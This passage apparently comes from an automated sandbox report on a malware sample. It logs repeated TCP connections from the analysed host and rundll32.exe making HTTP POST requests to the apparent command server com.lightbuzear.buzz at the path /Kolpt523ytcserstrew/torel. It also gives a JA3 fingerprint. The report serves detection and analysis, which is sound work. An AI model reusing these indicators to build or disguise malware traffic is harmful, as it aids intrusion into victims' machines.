Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49194 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49196 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49197 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49198 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49200 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49201 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49202 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49204 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49205 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49206 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49208 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49209 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49210 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49212 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49213 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49214 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49215 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49216 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49217 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49218 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49219 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49220 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443
Source: global traffic	TCP traffic: 192.168.2.22:49221 -> 64.52.80.180:443

Networking

Source: C:\Windows\System32\rundll32.exe	Network Connect: 142.250.185.228 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: com.lightbuzear.buzz
Source: C:\Windows\System32\rundll32.exe	Network Connect: 64.52.80.180 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: www.google.com

Source: Joe Sandbox View

ASN Name: WINDSTREAMUS WINDSTREAMUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.Google.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
